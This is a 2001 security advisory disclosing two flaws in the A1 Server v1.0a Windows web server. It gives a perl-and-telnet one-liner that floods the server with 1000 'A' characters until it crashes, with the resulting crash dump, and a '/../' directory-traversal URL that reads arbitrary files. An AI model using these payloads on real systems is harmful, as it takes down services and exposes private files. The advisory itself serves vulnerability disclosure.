A1 Server v1.0a HTTPd (DoS & Dir Traversal)
by Phiber on February 28th, 2001 A1 Server v1.0a is a HTTPd server for the Windows OS, and it will deliver the following content: GIF images, HTM or HTML pages, EXE files, and ZIP files. The server is very small, but yet somewhat stable and is freeware! (Yeah. right)
Problem #1 : Denial of Service Attack
A1 Server v1.0a is vulnerable to a nasty Denial of
Service attack where it can be flooded with useless
junk until the server crashes promptly. Once it has
been crashed it needs to be restarted again for it to
work properly. All windows versions apear to be
affected.
Example:
echo `perl -e 'print "A" x 1000'` | telnet a1server 80
^^ = Will cause the program to quit within seconds
and display:
A1SERVER caused an invalid page fault in module
A1SERVER.EXE at 016f:004101ae.
Registers:
EAX=00000000 CS=016f EIP=004101ae
EFLGS=00010246 EBX=00420094 SS=0177
ESP=006bfc70 EBP=006bfc78 ECX=ffffffff DS=0177
ESI=00000001 FS=6417 EDX=004263b2 ES=0177
EDI=00000001 GS=5e47 Bytes at CS:EIP:
f2 ae f7 d1 8b 7d 08 8b c7 8b d1 d1 e9 d1 e9 fc
Stack dump:
004211a8 0000001c 006bfca8 004151db 004211a8
00000001 006bfcb0 00008d20 006bfcfc bff7b796
bffc9490 00000177 006bfcb8 bff7b828 006bfcc8
bff7363b
Problem #2 : Directory Traversal
Adding the string "/../" to an URL allows an attacker to
view any file on the server provided you know where
the file is at in the first place.
Example:
http://www.a1server.win/../../../../../../Scandisk.log
^^ = Will obviously open the Scandisk.log file.
The Vendors website
Vendor has been notified. No e-mail reply yet.
--------------------
b10z HTTPd Advisory
[email protected]
Found: February 26th, 2001.